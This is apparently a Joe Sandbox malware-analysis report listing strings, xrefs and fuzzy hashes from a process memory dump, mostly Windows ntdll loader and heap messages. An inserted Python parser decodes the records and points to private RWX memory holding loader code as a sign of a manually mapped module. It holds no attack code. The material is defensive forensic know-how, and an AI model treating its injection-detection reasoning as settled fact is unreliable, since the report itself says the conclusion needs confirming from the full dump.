                                                                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                  • API String ID: 0-108210295
                                                                                  • Opcode ID: 287633ca5a138181f60d5c69f3a017ca41c7b9198e661258f3e43f5a22ae34e0
                                                                                  • Instruction ID: 4c0477c527ec500b33844124f5afe254d4aa0b8759645e9716dd8b25ddd83ae8
                                                                                  • Opcode Fuzzy Hash: 287633ca5a138181f60d5c69f3a017ca41c7b9198e661258f3e43f5a22ae34e0
                                                                                  • Instruction Fuzzy Hash: 9181BFB9A44210BFCB25DB14CC4EE6A7F76EF56B20F050088F2096F253E2768551FB62
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: dc7ee4db4c4f326d3ba0a1747ef2a865fd1a9d988508f007a971fb4cacc4f122
                                                                                  • Instruction ID: 748b156e366c2875ba310a7d42db09117d60f869ce21b83882974ae47bb8fee0
                                                                                  • Opcode Fuzzy Hash: dc7ee4db4c4f326d3ba0a1747ef2a865fd1a9d988508f007a971fb4cacc4f122
                                                                                  • Instruction Fuzzy Hash: 8C929979608341AFD721DF24C888F6ABBE9BB84710F044C6DFA95D7252D770E844EB92
                                                                                  Strings
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057B540A, 057B5496, 057B5519
                                                                                  • double initialized or corrupted critical section, xrefs: 057B5508
                                                                                  • Critical section address., xrefs: 057B5502
                                                                                  • 8, xrefs: 057B52E3
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057B54E2
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 057B5543
                                                                                  • Invalid debug info address of this critical section, xrefs: 057B54B6
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 057B54CE
                                                                                  • corrupted critical section, xrefs: 057B54C2
                                                                                  • Address of the debug info found in the active list., xrefs: 057B54AE, 057B54FA
                                                                                  • Thread identifier, xrefs: 057B553A
                                                                                  • Critical section address, xrefs: 057B5425, 057B54BC, 057B5534
                                                                                  • undeleted critical section in freed memory, xrefs: 057B542B
                                                                                  • Critical section debug info address, xrefs: 057B541F, 057B552E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 3fba126bcd930d8ecbbc940057d9fdb07601d9d6bacea5ff90f629d8d93f62ce
                                                                                  • Instruction ID: ae38be7388772caf17b26fd7b4f7323f3226da54b1a2534e122e69e5498c9778
                                                                                  • Opcode Fuzzy Hash: 3fba126bcd930d8ecbbc940057d9fdb07601d9d6bacea5ff90f629d8d93f62ce
                                                                                  • Instruction Fuzzy Hash: ED817DB1A40368EFEB20CF95D849FAEBBB6BB08714F104119F905B7241D3B5A941EB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-3197712848
                                                                                  • Opcode ID: 0d1a8c4a359564d976972a9cd0b00f0729334a26840bddb5482ad3c48312b2de
                                                                                  • Instruction ID: 260437a2f176c96baa201175cd016780ba9842f0f160a8934458220dca9200a2
                                                                                  • Opcode Fuzzy Hash: 0d1a8c4a359564d976972a9cd0b00f0729334a26840bddb5482ad3c48312b2de
                                                                                  • Instruction Fuzzy Hash: A912F5B1A083419BD725DF18C445BBAB7E5BF84724F040A2DFC8A8B291E7B4D944E792
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                  • API String ID: 0-1357697941
                                                                                  • Opcode ID: 03e37fc00ebd2f4b3fc399a6b7a6b5e228a1a78f55046658ed360655a7a1b951
                                                                                  • Instruction ID: 3d30651b99c1515060b423aa650bf30250cb7adaf9f23a67743c1417c7d4fc2a
                                                                                  • Opcode Fuzzy Hash: 03e37fc00ebd2f4b3fc399a6b7a6b5e228a1a78f55046658ed360655a7a1b951
                                                                                  • Instruction Fuzzy Hash: 7FF11371A04685EFCB25DF68C089BBABBF5FF09310F448059EA869B342D730E945EB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: cdd9f00eeef28ce940f20710f0bd1a2e6fbe9a0aa59f1f011bdadd10041503fe
                                                                                  • Instruction ID: 6ad9e9ba70a95be70bef3b03e164fa1e302746191fa63ee3cb768ae4feb1553a
                                                                                  • Opcode Fuzzy Hash: cdd9f00eeef28ce940f20710f0bd1a2e6fbe9a0aa59f1f011bdadd10041503fe
                                                                                  • Instruction Fuzzy Hash: 75D1EC71614684DFCB26DF68C44EAA9BBF2FF4A710F088449E9469B313D734E940EB14
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                  • API String ID: 0-664215390
                                                                                  • Opcode ID: 67cf87ba9bc9888b1c5312d90ae765a917313a9afe096af4e03b73075ddd9e26
                                                                                  • Instruction ID: 104dfb6ad198faf505113aa62477418daa5743bb7217d28343c5694b118d6c55
                                                                                  • Opcode Fuzzy Hash: 67cf87ba9bc9888b1c5312d90ae765a917313a9afe096af4e03b73075ddd9e26
                                                                                  • Instruction Fuzzy Hash: 32328F71A442698BDF22CF14C898BFEB7B6BF85340F1441EAE84DA7250D7759E81AF40
                                                                                  Strings
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 057B292E
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 057B28B2
                                                                                  • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 057B2881
                                                                                  • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 057B29B1
                                                                                  • @, xrefs: 05773180
                                                                                  • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 057B2856
                                                                                  • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 057B29AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                  • API String ID: 0-541586583
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrutil.c, xrefs: 057C4E06
                                                                                  • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 057C4E38
                                                                                  • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 057C4DF5
                                                                                  • LdrpProtectedCopyMemory, xrefs: 057C4DF4
                                                                                  • LdrpGenericExceptionFilter, xrefs: 057C4DFC
                                                                                  • Execute '.cxr %p' to dump context, xrefs: 057C4EB1
                                                                                  • ***Exception thrown within loader***, xrefs: 057C4E27
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-2973941816
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  Strings
                                                                                  • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 057B276F
                                                                                  • \WinSxS\, xrefs: 05772E23
                                                                                  • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 057B279C
                                                                                  • .Local\, xrefs: 05772D91
                                                                                  • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 057B2706
                                                                                  • @, xrefs: 05772E4D
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                  • API String ID: 0-3926108909
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05799A11, 05799A3A
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05799A2A
                                                                                  • apphelp.dll, xrefs: 05736496
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05799A01
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 057999ED
                                                                                  • LdrpInitShimEngine, xrefs: 057999F4, 05799A07, 05799A30
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  Strings
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 057B2165
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 057B2160, 057B219A, 057B21BA
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 057B219F
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 057B21BF
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 057B2180
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 057B2178
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  Strings
                                                                                  • LdrpInitializeImportRedirection, xrefs: 057B8177, 057B81EB
                                                                                  • LdrpInitializeProcess, xrefs: 0577C6C4
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0577C6C3
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 057B8181, 057B81F5
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 057B8170
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 057B81E5
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  APIs
                                                                                    • Part of subcall function 05782DF0: LdrInitializeThunk.NTDLL ref: 05782DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05780D74
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                  • API String ID: 0-2518169356
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 05778422
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05778421
                                                                                  • @, xrefs: 05778591
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0577855E
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  Strings
                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 057A55AE
                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 057A54ED
                                                                                  • HEAP[%wZ]: , xrefs: 057A54D1, 057A5592
                                                                                  • HEAP: , xrefs: 057A54E0, 057A55A1
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                  • API String ID: 0-1657114761
                                                                                  Strings
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 057B21DE
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 057B22B6
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 057B21D9, 057B22B1
                                                                                  • .Local, xrefs: 057728D8
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: dc687728f90ab39912e52136f13ed6b3c677ff91f4eeba60ac95556c2fa207de
                                                                                  • Instruction ID: 912d10bde33db7fff56937bad768c6a26f70a5ac14ed3a1c9c04c936951a3dfe
                                                                                  • Opcode Fuzzy Hash: dc687728f90ab39912e52136f13ed6b3c677ff91f4eeba60ac95556c2fa207de
                                                                                  • Instruction Fuzzy Hash: 03A1A039A0522D9FDF24CF64D888BE9B3B1BF58314F1501E9D819AB252D7709E81EF90
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 057A10AE
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 057A0FE5
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 057A1028
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 057A106B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: d8734c68a01aa363eb3f030b30cdb41565924412f84e772ac6ba100375968c57
                                                                                  • Instruction ID: 5c443f38016dd1710cb24d9de3e1354ec98a2177fc4ae777786aac6f2c7ad006
                                                                                  • Opcode Fuzzy Hash: d8734c68a01aa363eb3f030b30cdb41565924412f84e772ac6ba100375968c57
                                                                                  • Instruction Fuzzy Hash: AA71D6B1A043449FCB20EF15C889FABBFA9AF85764F400568F9498B146D734D588EFD2
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 057B3640, 057B366C
                                                                                  • LdrpFindDllActivationContext, xrefs: 057B3636, 057B3662
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 057B365C
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 057B362F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 0-3779518884
                                                                                  • Opcode ID: 49d8e758c6d996e426c2e6d92477e2431c2d9046819ec90e8af837cb036b2f37
                                                                                  • Instruction ID: 022863e871f48089ed00a006ba57ea5fe08be76702b3dc811d37e88908fd1547
                                                                                  • Opcode Fuzzy Hash: 49d8e758c6d996e426c2e6d92477e2431c2d9046819ec90e8af837cb036b2f37
                                                                                  • Instruction Fuzzy Hash: EC314C72A04239AEDF31DF48E849F75B6ABFB01714F064426EA8553250DBA0AF80B7D5
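The per-function records above (string xrefs, the Memory Dump Source line, the Similarity IDs and fuzzy hashes) are regular enough to parse, which is how a practitioner pivots from this listing to the questions that matter: which module's code is in this region, and what kind of region it is. The Python below is an added example, not Joe Sandbox or IDA-plugin code; it parses two records copied from the listing (constructed inline so it runs offline), checks each record for internal consistency, and decodes the .sdmp filename. The filename decoding rests on an assumption the page does not state, that the dotted fields are process index, dump phase, dump id, region base, page protection, memory state and memory type, read as the standard Win32 constants; the base field can be cross-checked against the record's Offset, the others cannot from this page alone.

```python
import re

# Constructed sample in the shape of the report's per-function entries (two
# trimmed records, constructed here so the parser runs offline).
SAMPLE = r"""
Strings
• minkernel\ntdll\ldrsnap.c, xrefs: 057B3640, 057B366C
• LdrpFindDllActivationContext, xrefs: 057B3636, 057B3662
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Similarity
• API ID:
• String ID: LdrpFindDllActivationContext$minkernel\ntdll\ldrsnap.c
• API String ID: 0-3779518884
• Opcode ID: 49d8e758c6d996e426c2e6d92477e2431c2d9046819ec90e8af837cb036b2f37
• Opcode Fuzzy Hash: 49d8e758c6d996e426c2e6d92477e2431c2d9046819ec90e8af837cb036b2f37
• Instruction Fuzzy Hash: EC314C72A04239AEDF31DF48E849F75B6ABFB01714F064426EA8553250DBA0AF80B7D5
APIs
• @_EH4_CallFilterFunc@8.LIBCMT ref: 057CCFBD
Strings
Memory Dump Source
• Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
Similarity
• API ID: CallFilterFunc@8
• String ID: @
• API String ID: 4062629308-2766056989
• Opcode ID: 139dfb1bcf475be37b35ddae196f1c7bef4cce29c005ad15f21f6c9302e2c1f1
• Opcode Fuzzy Hash: 139dfb1bcf475be37b35ddae196f1c7bef4cce29c005ad15f21f6c9302e2c1f1
• Instruction Fuzzy Hash: C441BFB1A00654DFCB21DFA9C849A6DBBB8FF44710F00456EED15DB250EB74D841EBA4
"""

FIELD_KEYS = {"Source File", "Snapshot File", "API ID", "String ID", "API String ID",
              "Opcode ID", "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
SOURCE_RE = re.compile(r"(?P<file>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)")

# Standard Win32 memory constants (MEMORY_BASIC_INFORMATION Protect / State / Type).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_records(text):
    """Split the listing into one dict per function record: the Similarity fields
    by name, plus 'strings' [(text, [xref addrs])], 'apis' [(name, ref addr)],
    'dump_file', 'base' (the Offset) and 'based_on_pe'."""
    records, cur = [], {"strings": [], "apis": []}
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line.endswith(":") and line[:-1] in FIELD_KEYS:   # e.g. "API ID:" with no value
            cur[line[:-1]] = ""
            continue
        key, sep, value = line.partition(": ")
        if sep and key in FIELD_KEYS:
            if key == "Source File":
                m = SOURCE_RE.match(value)
                cur.update(dump_file=m["file"], base=int(m["off"], 16),
                           based_on_pe=m["pe"].lower() == "true")
            else:
                cur[key] = value
            if key == "Instruction Fuzzy Hash":               # always the record's last field
                records.append(cur)
                cur = {"strings": [], "apis": []}
        elif ", xrefs: " in line:                             # string bullet; text itself may contain ':'
            s, _, refs = line.rpartition(", xrefs: ")
            cur["strings"].append((s, [int(a, 16) for a in refs.split(", ")]))
        elif " ref: " in line:                                # APIs bullet
            name, _, ref = line.rpartition(" ref: ")
            cur["apis"].append((name, int(ref, 16)))
    return records


def describe_dump(dump_file):
    """Decode the .sdmp filename. ASSUMPTION (not stated on the page): the dotted
    fields are process index, dump phase, dump id, region base, page protection,
    memory state, memory type. Only the base is verifiable against Offset."""
    f = dump_file.split(".")
    p, st, ty = (int(x, 16) for x in f[4:7])
    return {"process_index": int(f[0], 16), "base": int(f[3], 16),
            "protect": PAGE_PROTECT.get(p, hex(p)), "state": MEM_STATE.get(st, hex(st)),
            "type": MEM_TYPE.get(ty, hex(ty))}


def check_record(rec):
    """Self-consistency checks; an empty list means the record checks out."""
    issues = []
    if rec.get("Opcode Fuzzy Hash") != rec.get("Opcode ID"):
        issues.append("Opcode Fuzzy Hash differs from Opcode ID")
    if describe_dump(rec["dump_file"])["base"] != rec["base"]:
        issues.append("dump filename base does not match Offset")
    for text, refs in rec["strings"]:
        issues += [f"xref {a:08X} for {text!r} lies below the dump base" for a in refs if a < rec["base"]]
    for name, a in rec["apis"]:
        if a < rec["base"]:
            issues.append(f"ref {a:08X} for {name!r} lies below the dump base")
    return issues


def source_paths(records):
    """Source-file strings (e.g. minkernel\\ntdll\\...) identify whose code the region holds."""
    return sorted({s for r in records for s, _ in r["strings"] if "\\" in s and s.endswith(".c")})


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", source_paths(recs), describe_dump(recs[0]["dump_file"]))
    for r in recs:
        print(r["String ID"], "->", check_record(r) or "ok")
```

Run against the records on this page, `source_paths` returns ntdll source paths (ldrsnap.c, ldrinit.c, ldrredirect.c), so the region at 0x05710000 holds loader code, and, if the filename layout assumed above is right, `describe_dump` reports it as a committed, private (not image-backed) PAGE_EXECUTE_READWRITE region that the plugin still parsed as a PE. That combination, loader code in private RWX memory rather than in the image mapping of ntdll.dll, is the shape a manually mapped module takes and is worth confirming from the full dump before drawing conclusions from the string hits alone.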
                                                                                  Strings
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 057AA992
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 057AA9A2
                                                                                  • apphelp.dll, xrefs: 05762462
                                                                                  • LdrpDynamicShimModule, xrefs: 057AA998
                                                                                  Memory Dump Source
